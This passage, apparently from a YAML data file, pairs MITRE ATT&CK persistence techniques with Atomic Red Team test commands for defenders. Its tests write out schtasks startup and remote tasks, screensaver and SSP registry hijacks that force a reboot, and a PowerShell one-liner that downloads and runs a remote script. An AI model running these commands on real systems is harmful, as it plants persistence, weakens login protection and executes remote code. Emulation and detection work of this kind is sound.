(2017, July 13). Attacking SQL Server CLR Assemblies. - Retrieved July 8, 2019. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: SQL Stored Procedures - description: "Adversaries may abuse SQL stored procedures to establish persistent - access to systems. SQL Stored Procedures are code that can be saved and reused - so that database users do not waste time rewriting frequently used SQL queries. - Stored procedures can be invoked via SQL statements to the database using - the procedure name or via defined events (e.g. when a SQL server application - is started/restarted).\n\nAdversaries may craft malicious stored procedures - that can provide a persistence mechanism in SQL database servers.(Citation: - NetSPI Startup Stored Procedures)(Citation: Kaspersky MSSQL Aug 2019) To execute - operating system commands through SQL syntax the adversary may have to enable - additional functionality, such as xp_cmdshell for MSSQL Server.(Citation: - NetSPI Startup Stored Procedures)(Citation: Kaspersky MSSQL Aug 2019)(Citation: - Microsoft xp_cmdshell 2017) \n\nMicrosoft SQL Server can enable common language - runtime (CLR) integration. With CLR integration enabled, application developers - can write stored procedures using any .NET framework language (e.g. 
VB .NET, - C#, etc.).(Citation: Microsoft CLR Integration 2017) Adversaries may craft - or modify CLR assemblies that are linked to stored procedures since these - CLR assemblies can be made to execute arbitrary commands.(Citation: NetSPI - SQL Server CLR) " - id: attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-25T23:30:20.638Z' - created: '2019-12-12T14:59:58.168Z' - x_mitre_data_sources: - - Application logs - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - - SYSTEM - - root - x_mitre_detection: 'On a MSSQL Server, consider monitoring for xp_cmdshell usage.(Citation: - NetSPI Startup Stored Procedures) Consider enabling audit features that can - log malicious startup activities.' - x_mitre_contributors: - - Carlos Borges, @huntingneo, CIP - - Lucas da Silva Pereira, @vulcanunsec, CIP - - Kaspersky - x_mitre_platforms: - - Windows - - Linux - atomic_tests: [] - T1098.004: - technique: - external_references: - - source_name: mitre-attack - external_id: T1098.004 - url: https://attack.mitre.org/techniques/T1098/004 - - source_name: SSH Authorized Keys - url: https://www.ssh.com/ssh/authorized_keys/ - description: ssh.com. (n.d.). Authorized_keys File in SSH. Retrieved June - 24, 2020. - - source_name: Venafi SSH Key Abuse - url: https://www.venafi.com/blog/growing-abuse-ssh-keys-commodity-malware-campaigns-now-equipped-ssh-capabilities - description: 'Blachman, Y. (2020, April 22). Growing Abuse of SSH Keys: Commodity - Malware Campaigns Now Equipped with SSH Capabilities. Retrieved June 24, - 2020.' - - source_name: Cybereason Linux Exim Worm - url: https://www.cybereason.com/blog/new-pervasive-worm-exploiting-linux-exim-server-vulnerability - description: Cybereason Nocturnus. (2019, June 13). New Pervasive Worm Exploiting - Linux Exim Server Vulnerability. 
Retrieved June 24, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: SSH Authorized Keys - description: |- - Adversaries may modify the SSH authorized_keys file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The authorized_keys file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <user-home>/.ssh/authorized_keys.(Citation: SSH Authorized Keys) Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under /etc/ssh/sshd_config. - - Adversaries may modify SSH authorized_keys files directly with scripts or shell commands to add their own adversary-supplied public keys. This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse) (Citation: Cybereason Linux Exim Worm) - id: attack-pattern--6b57dc31-b814-4a03-8706-28bc20d739c4 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-06-25T16:32:23.367Z' - created: '2020-06-24T12:42:35.144Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User - - Administrator - x_mitre_detection: |- - Use file integrity monitoring to detect changes made to the authorized_keys file for each user on a system. Monitor for suspicious processes modifying the authorized_keys file. - - Monitor for changes to and suspicious processes modifiying /etc/ssh/sshd_config. 
- x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - File monitoring - x_mitre_contributors: - - Tony Lambert, Red Canary - x_mitre_platforms: - - Linux - - macOS - identifier: T1098.004 - atomic_tests: - - name: Modify SSH Authorized Keys - auto_generated_guid: 342cc723-127c-4d3a-8292-9c0c6b4ecadc - description: "Modify contents of /.ssh/authorized_keys to maintain - persistence on victim host. \nIf the user is able to save the same contents - in the authorized_keys file, it shows user can modify the file.\n" - supported_platforms: - - macos - - linux - executor: - name: bash - elevation_required: false - command: 'if [ -f ~/.ssh/authorized_keys ]; then ssh_authorized_keys=$(cat - ~/.ssh/authorized_keys); echo $ssh_authorized_keys > ~/.ssh/authorized_keys; - fi; - -' - cleanup_command: 'unset ssh_authorized_keys - -' - T1053.005: - technique: - external_references: - - source_name: mitre-attack - external_id: T1053.005 - url: https://attack.mitre.org/techniques/T1053/005 - - url: https://twitter.com/leoloobeek/status/939248813465853953 - description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved - December 12, 2017. - source_name: Twitter Leoloobeek Scheduled Task - - url: https://social.technet.microsoft.com/Forums/en-US/e5bca729-52e7-4fcb-ba12-3225c564674c/scheduled-tasks-history-retention-settings?forum=winserver8gen - description: Satyajit321. (2015, November 3). Scheduled Tasks History Retention - settings. Retrieved December 12, 2017. - source_name: TechNet Forum Scheduled Task Operational Setting - - url: https://technet.microsoft.com/library/dd315590.aspx - description: Microsoft. (n.d.). General Task Registration. Retrieved December - 12, 2017. - source_name: TechNet Scheduled Task Events - - source_name: Microsoft Scheduled Task Events Win10 - url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-object-access-events - description: Microsoft. (2017, May 28). 
Audit Other Object Access Events. - Retrieved June 27, 2019. - - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 - description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. - Retrieved June 6, 2016. - source_name: TechNet Autoruns - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Scheduled Task - description: |- - Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The schtasks can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task. - - The deprecated [at](https://attack.mitre.org/software/S0110) utility could also be abused by adversaries (ex: [At (Windows)](https://attack.mitre.org/techniques/T1053/002)), though at.exe can not access tasks created with schtasks or the Control Panel. - - An adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account (such as SYSTEM). 
- id: attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: execution - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-24T13:45:03.730Z' - created: '2019-11-27T14:58:00.429Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_remote_support: true - x_mitre_permissions_required: - - Administrator - x_mitre_detection: |- - Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\System32\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc. - - Configure event logging for scheduled task creation and changes by enabling the "Microsoft-Windows-TaskScheduler/Operational" setting within the event logging service. 
(Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10) - - * Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered - * Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated - * Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted - * Event ID 4698 on Windows 10, Server 2016 - Scheduled task created - * Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled - * Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled - - Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns) - - Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data. - x_mitre_data_sources: - - File monitoring - - Process command-line parameters - - Process monitoring - - Windows event logs - x_mitre_platforms: - - Windows - identifier: T1053.005 - atomic_tests: - - name: Scheduled Task Startup Script - auto_generated_guid: fec27f65-db86-4c2d-b66c-61945aee87c2 - description: | - Run an exe on user logon or system startup. Upon execution, success messages will be displayed for the two scheduled tasks. To view - the tasks, open the Task Scheduler and look in the Active Tasks pane. 
- supported_platforms: - - windows - executor: - command: | - schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe" - schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe" - cleanup_command: | - schtasks /delete /tn "T1053_005_OnLogon" /f >nul 2>&1 - schtasks /delete /tn "T1053_005_OnStartup" /f >nul 2>&1 - name: command_prompt - elevation_required: true - - name: Scheduled task Local - auto_generated_guid: 42f53695-ad4a-4546-abb6-7d837f644a71 - description: 'Upon successful execution, cmd.exe will create a scheduled task - to spawn cmd.exe at 20:10. - -' - supported_platforms: - - windows - input_arguments: - task_command: - description: What you want to execute - type: String - default: C:\windows\system32\cmd.exe - time: - description: What time 24 Hour - type: String - default: 72600 - executor: - name: command_prompt - elevation_required: false - command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time} - -' - cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1 - -' - - name: Scheduled task Remote - auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd - description: | - Create a task on a remote system. - - Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10 on a remote endpoint. 
- supported_platforms: - - windows - input_arguments: - task_command: - description: What you want to execute - type: String - default: C:\windows\system32\cmd.exe - time: - description: What time 24 Hour - type: String - default: 72600 - target: - description: Target - type: String - default: localhost - user_name: - description: 'Username to authenticate with, format: DOMAIN\User' - type: String - default: DOMAIN\user - password: - description: Password to authenticate with - type: String - default: At0micStrong - executor: - name: command_prompt - elevation_required: true - command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN - "Atomic task" /TR "#{task_command}" /SC daily /ST #{time} - -' - cleanup_command: 'SCHTASKS /Delete /S #{target} /RU #{user_name} /RP #{password} - /TN "Atomic task" /F >nul 2>&1 - -' - - name: Powershell Cmdlet Scheduled Task - auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd - description: | - Create an atomic scheduled task that leverages native powershell cmdlets. - - Upon successful execution, powershell.exe will create a scheduled task to spawn cmd.exe at 20:10. - supported_platforms: - - windows - executor: - name: powershell - elevation_required: false - command: | - $Action = New-ScheduledTaskAction -Execute "calc.exe" - $Trigger = New-ScheduledTaskTrigger -AtLogon - $User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest - $Set = New-ScheduledTaskSettingsSet - $object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set - Register-ScheduledTask AtomicTask -InputObject $object - cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false - >$null 2>&1 - -' - - name: Task Scheduler via VBA - auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3 - description: | - This module utilizes the Windows API to schedule a task for code execution (notepad.exe). 
The task scheduler will execute "notepad.exe" within - 30 - 40 seconds after this module has run - supported_platforms: - - windows - input_arguments: - ms_product: - description: Maldoc application Word - type: String - default: Word - dependency_executor_name: powershell - dependencies: - - description: 'Microsoft #{ms_product} must be installed - -' - prereq_command: | - try { - New-Object -COMObject "#{ms_product}.Application" | Out-Null - $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"} - Stop-Process -Name $process - exit 0 - } catch { exit 1 } - get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} - manually to meet this requirement" - -' - executor: - command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\" - -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1053.005\\src\\T1053.005-macrocode.txt\" - -officeProduct \"#{ms_product}\" -sub \"Scheduler\"\n" - name: powershell - - name: WMI Invoke-CimMethod Scheduled Task - auto_generated_guid: e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b - description: 'Create an scheduled task that executes notepad.exe after user - login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing - as Register-ScheduledTask cmdlet behind the scenes. 
- -' - supported_platforms: - - windows - executor: - name: powershell - elevation_required: true - command: | - $xml = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1053.005\src\T1053_005_WMI.xml") - Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; } - cleanup_command: 'Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false - >$null 2>&1 - -' - T1053: - technique: - created: '2017-05-31T21:30:46.977Z' - modified: '2020-10-14T15:20:01.069Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: execution - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - type: attack-pattern - id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Scheduled Task/Job - description: |- - Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security) - - Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges). 
- external_references: - - source_name: mitre-attack - external_id: T1053 - url: https://attack.mitre.org/techniques/T1053 - - external_id: CAPEC-557 - source_name: capec - url: https://capec.mitre.org/data/definitions/557.html - - url: https://technet.microsoft.com/en-us/library/cc785125.aspx - description: Microsoft. (2005, January 21). Task Scheduler and security. Retrieved - June 8, 2016. - source_name: TechNet Task Scheduler Security - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - x_mitre_platforms: - - Windows - - Linux - - macOS - x_mitre_remote_support: true - x_mitre_effective_permissions: - - SYSTEM - - Administrator - - User - x_mitre_permissions_required: - - Administrator - - SYSTEM - - User - x_mitre_detection: "Monitor scheduled task creation from common utilities using - command-line invocation. Legitimate scheduled tasks may be created during - installation of new software or through system administration functions. Look - for changes to tasks that do not correlate with known software, patch cycles, - etc. \n\nSuspicious program execution through scheduled tasks may show up - as outlier processes that have not been seen before when compared against - historical data. Data and events should not be viewed in isolation, but as - part of a chain of behavior that could lead to other activities, such as network - connections made for Command and Control, learning details about the environment - through Discovery, and Lateral Movement." 
- x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters - - Windows event logs - x_mitre_contributors: - - Prashant Verma, Paladion - - Leo Loobeek, @leoloobeek - - Travis Smith, Tripwire - - Alain Homewood, Insomnia Security - x_mitre_version: '2.0' - x_mitre_is_subtechnique: false - atomic_tests: [] - T1546.002: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546.002 - url: https://attack.mitre.org/techniques/T1546/002 - - source_name: Wikipedia Screensaver - description: Wikipedia. (2017, November 22). Screensaver. Retrieved December - 5, 2017. - url: https://en.wikipedia.org/wiki/Screensaver - - source_name: ESET Gazer Aug 2017 - description: 'ESET. (2017, August). Gazing at Gazer: Turla’s new second stage - backdoor. Retrieved September 14, 2017.' - url: https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Screensaver - description: |- - Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.scr is located in C:\Windows\System32\, and C:\Windows\sysWOW64\ on 64-bit Windows systems, along with screensavers included with base Windows installations. 
- - The following screensaver settings are stored in the Registry (HKCU\Control Panel\Desktop\) and could be manipulated to achieve persistence: - - * SCRNSAVE.exe - set to malicious PE path - * ScreenSaveActive - set to '1' to enable the screensaver - * ScreenSaverIsSecure - set to '0' to not require a password to unlock - * ScreenSaveTimeout - sets user inactivity timeout before screensaver is executed - - Adversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity. (Citation: ESET Gazer Aug 2017) - id: attack-pattern--ce4b7013-640e-48a9-b501-d0025a95f4bf - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-23T12:23:04.955Z' - created: '2020-01-24T13:51:01.210Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User - x_mitre_detection: |- - Monitor process execution and command-line parameters of .scr files. Monitor changes to screensaver configuration changes in the Registry that may not correlate with typical user behavior. - - Tools such as Sysinternals Autoruns can be used to detect changes to the screensaver binary path in the Registry. Suspicious paths and PE files may indicate outliers among legitimate screensavers in a network and should be investigated. - x_mitre_data_sources: - - File monitoring - - Windows Registry - - Process command-line parameters - - Process monitoring - x_mitre_contributors: - - Bartosz Jerzman - x_mitre_platforms: - - Windows - identifier: T1546.002 - atomic_tests: - - name: Set Arbitrary Binary as Screensaver - auto_generated_guid: 281201e7-de41-4dc9-b73d-f288938cbb64 - description: 'This test copies a binary into the Windows System32 folder and - sets it as the screensaver so it will execute for persistence. Requires a - reboot and logon. 
- -' - supported_platforms: - - windows - input_arguments: - input_binary: - description: Executable binary to use in place of screensaver for persistence - type: path - default: C:\Windows\System32\cmd.exe - executor: - command: | - copy #{input_binary} "%SystemRoot%\System32\evilscreensaver.scr" - reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d 1 /f - reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeout /t REG_SZ /d 60 /f - reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverIsSecure /t REG_SZ /d 0 /f - reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "%SystemRoot%\System32\evilscreensaver.scr" /f - shutdown /r /t 0 - name: command_prompt - elevation_required: true - T1547.005: - technique: - external_references: - - source_name: mitre-attack - external_id: T1547.005 - url: https://attack.mitre.org/techniques/T1547/005 - - url: http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html - description: Graeber, M. (2014, October). Analysis of Malicious Security Support - Provider DLLs. Retrieved March 1, 2017. - source_name: Graeber 2014 - - url: https://technet.microsoft.com/en-us/library/dn408187.aspx - description: Microsoft. (2013, July 31). Configuring Additional LSA Protection. - Retrieved June 24, 2015. - source_name: Microsoft Configure LSA - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Security Support Provider - description: |- - Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. 
- - The SSP configuration is stored in two Registry keys: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages and HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014) - id: attack-pattern--5095a853-299c-4876-abd7-ac0050fb5462 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-25T15:42:48.910Z' - created: '2020-01-24T17:16:11.806Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - x_mitre_detection: 'Monitor the Registry for changes to the SSP Registry keys. - Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 - R2 may generate events when unsigned SSP DLLs try to load into the LSA by - setting the Registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image - File Execution Options\LSASS.exe with AuditLevel = 8. (Citation: Graeber - 2014) (Citation: Microsoft Configure LSA)' - x_mitre_data_sources: - - DLL monitoring - - Windows Registry - - Loaded DLLs - x_mitre_platforms: - - Windows - identifier: T1547.005 - atomic_tests: - - name: Modify SSP configuration in registry - auto_generated_guid: afdfd7e3-8a0b-409f-85f7-886fdf249c9e - description: Add a value to a Windows registry SSP key, simulating an adversarial - modification of those keys. - supported_platforms: - - windows - input_arguments: - fake_ssp_dll: - description: Value added to registry key. Normally refers to a DLL name - in C:\Windows\System32. 
- type: String - default: not-a-ssp - executor: - command: | - # run these in sequence - $SecurityPackages = Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages' - $SecurityPackagesUpdated = $SecurityPackages - $SecurityPackagesUpdated += "#{fake_ssp_dll}" - Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackagesUpdated - - # revert (before reboot) - Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackages - name: powershell - elevation_required: true - T1505: - technique: - id: attack-pattern--d456de47-a16f-4e46-8980-e67478a12dcb - description: Adversaries may abuse legitimate extensible development features - of servers to establish persistent access to systems. Enterprise server applications - may include features that allow developers to write and install software or - scripts to extend the functionality of the main application. Adversaries may - install malicious components to extend and abuse server applications. - name: Server Software Component - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1505 - url: https://attack.mitre.org/techniques/T1505 - - url: https://www.us-cert.gov/ncas/alerts/TA15-314A - description: US-CERT. (2015, November 13). Compromised Web Servers and Web - Shells - Threat Awareness and Guidance. Retrieved June 8, 2016. 
- source_name: US-CERT Alert TA15-314A Web Shells - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-09-16T19:34:19.961Z' - created: '2019-06-28T17:52:07.296Z' - x_mitre_is_subtechnique: false - x_mitre_platforms: - - Windows - - Linux - - macOS - x_mitre_permissions_required: - - Administrator - - SYSTEM - - root - x_mitre_version: '1.1' - x_mitre_data_sources: - - Netflow/Enclave netflow - - Process monitoring - - File monitoring - - Application logs - x_mitre_detection: "Consider monitoring application logs for abnormal behavior - that may indicate suspicious installation of application software components. - Consider monitoring file locations associated with the installation of new - application software components such as paths from which applications typically - load such extensible components.\n\nProcess monitoring may be used to detect - servers components that perform suspicious actions such as running cmd.exe - or accessing files. Log authentication attempts to the server and any unusual - traffic patterns to or from the server and internal network. (Citation: US-CERT - Alert TA15-314A Web Shells) " - atomic_tests: [] - T1574.010: - technique: - external_references: - - source_name: mitre-attack - external_id: T1574.010 - url: https://attack.mitre.org/techniques/T1574/010 - - external_id: CAPEC-17 - source_name: capec - url: https://capec.mitre.org/data/definitions/17.html - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Services File Permissions Weakness - description: |- - Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. 
These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM. - - Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence. - id: attack-pattern--9e8b28c9-35fe-48ac-a14d-e6cc032dcbcd - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-09-16T19:10:04.262Z' - created: '2020-03-12T20:43:53.998Z' - x_mitre_contributors: - - Travis Smith, Tripwire - - Stefan Kanthak - x_mitre_data_sources: - - Process command-line parameters - - Services - - File monitoring - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_effective_permissions: - - SYSTEM - - Administrator - - User - x_mitre_permissions_required: - - Administrator - - User - x_mitre_detection: "Look for changes to binaries and service executables that - may normally occur during software updates. If an executable is written, renamed, - and/or moved to match an existing service executable, it could be detected - and correlated with other suspicious behavior. 
Hashing of binaries and service - executables could be used to detect replacement against historical data.\n\nLook - for abnormal process call trees from typical processes and services and for - execution of other commands that could relate to Discovery or other adversary - techniques. " - x_mitre_platforms: - - Windows - atomic_tests: [] - T1574.011: - technique: - external_references: - - source_name: mitre-attack - external_id: T1574.011 - url: https://attack.mitre.org/techniques/T1574/011 - - external_id: CAPEC-478 - source_name: capec - url: https://capec.mitre.org/data/definitions/478.html - - source_name: Registry Key Security - url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry-key-security-and-access-rights?redirectedfrom=MSDN - description: Microsoft. (2018, May 31). Registry Key Security and Access Rights. - Retrieved March 16, 2017. - - source_name: Kansa Service related collectors - url: https://trustedsignal.blogspot.com/2014/05/kansa-service-related-collectors-and.html - description: 'Hull, D.. (2014, May 3). Kansa: Service related collectors and - analysis. Retrieved October 10, 2019.' - - source_name: Tweet Registry Perms Weakness - url: https://twitter.com/r0wdy_/status/936365549553991680 - description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved - April 9, 2018." - - source_name: Autoruns for Windows - url: https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - description: Mark Russinovich. (2019, June 28). Autoruns for Windows v13.96. - Retrieved March 13, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Services Registry Permissions Weakness - description: "Adversaries may execute their own malicious payloads by hijacking - the Registry entries used by services. 
Adversaries may use flaws in the permissions - for registry to redirect from the originally specified executable to one that - they control, in order to launch their own code at Service start. Windows - stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services. - The information stored under a service's Registry keys can be manipulated - to modify a service's execution parameters through tools such as the service - controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), - or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys - is controlled through Access Control Lists and permissions. (Citation: Registry - Key Security)\n\nIf the permissions for users and groups are not properly - set and allow access to the Registry keys for a service, then adversaries - can change the service binPath/ImagePath to point to a different executable - under their control. When the service starts or is restarted, then the adversary-controlled - program will execute, allowing the adversary to gain persistence and/or privilege - escalation to the account context the service is set to execute under (local/domain - account, SYSTEM, LocalService, or NetworkService).\n\nAdversaries may also - alter Registry keys associated with service failure parameters (such as FailureCommand) - that may be executed in an elevated context anytime the service fails or is - intentionally corrupted.(Citation: Kansa Service related collectors)(Citation: - Tweet Registry Perms Weakness) " - id: attack-pattern--17cc750b-e95b-4d7d-9dde-49e0de24148c - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-09-16T19:07:48.590Z' - created: '2020-03-13T11:42:14.444Z' - x_mitre_defense_bypassed: - - Application control - 
